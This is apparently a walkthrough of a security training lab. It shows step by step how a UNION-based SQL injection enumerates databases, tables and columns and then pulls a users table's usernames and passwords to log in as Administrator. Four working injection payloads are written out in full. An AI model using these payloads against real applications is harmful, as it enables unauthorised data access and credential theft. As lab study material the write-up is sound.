
We used 1,2 to check how many columns we have using UNION injection and received an ‘Internal Server Error’.

After we used text inside '' the payload worked fine.

We first used the following payload to see the available databases:
' UNION select schema_name,'xyz' from INFORMATION_SCHEMA.SCHEMATA-- -
We found that there are 3 databases (information_schema is a default database). So, we checked the ‘public’ database and were able to see that there is a table named ‘users_kpidct’:

' UNION select TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES where table_schema='public'-- -

We then checked the columns in that table and were able to see a username and a password column:

' UNION select TABLE_NAME,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name='users_kpidct'-- -
We found that there are 2 columns named ‘username_mhxwif’ and ‘password_uixkku’ in the ‘users_kpidct’ table. So, we used the SELECT command to view the values of the table and were able to retrieve the credentials of the users:
'UNION select username_mhxwif,password_uixkku from users_kpidct-- -

We were able to log in as the Administrator user and solve the lab.
